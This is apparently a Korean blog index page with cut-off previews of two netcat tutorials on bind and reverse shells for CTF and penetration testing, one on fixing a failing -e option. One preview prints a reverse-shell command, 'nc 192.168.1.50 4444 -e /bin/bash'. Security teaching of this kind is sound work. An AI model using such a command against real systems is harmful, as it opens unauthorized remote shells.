unknown08 님의 블로그

기본편에서는 netcat의 기본적인 리버스 셸과 바인드 셸 사용법을 알아보았다하지만 실전 환경(CTF, 침투 테스트)에서는 기본편에서 배운 명령어가 그대로 작동하지 않는 경우가 많다그렇기 때문에 오늘 글에서는 netcat을 사용하며 자주 겪는 문제들과 이에 대한 해결 방법을 다룰 것이다 《 문제상황 1 》- e 옵션이 작동하지 않을 때기본편에선 잠깐 나오고 제대로 된 설명이 없었기에 먼저 - e가 뭔지부터 설명하겠다- e는 기본적으로 특정 프로그램을 실행하고 그 프로그램의 입출력을 네트워크 연결로 리다이렉트한다고 생각하면 된다 쉽게 설명하자면 우리가 앞서 사용하였던 이 코드를 예시로 보면 된다 nc 192.168.1.50 4444 -e /bin/bash이 코드에선 - e를 통하여 bash의 입출력을 리다..

netcat이란 tcp나 udp 프로토콜을 사용하여 네트워크 연결을 만들고 데이터를 송수신할 수 있는 네트워킹 유틸리티이다쉽게 설명하자면 네트워크를 통해서 파일을 주고받거나 다른 컴퓨터와 상호작용할 수 있도록 도와주는 툴이다또한 netcat은 복잡한 명령줄이 필요 없어 직관적이고 초기정찰부터 데이터 추출까지 광범위한 사용이 가능하기 때문에 침투 테스터들에겐 필수인 도구이다 오늘은 간단하게 netcat의 사용법에 대해 실습을 하며 설명하도록 하겠다 먼저 netcat은 바인드 셸(공격자가 대상으로 연결)이나 리버스 셸(대상이 공격자로 연결)처럼 다양한 방법들로 연결이 가능하다(셸에 대한 기본적인 설명은 여기에 적어 두었다 https://unknown08.tistory.com/36 ) netcat을 아래의 두..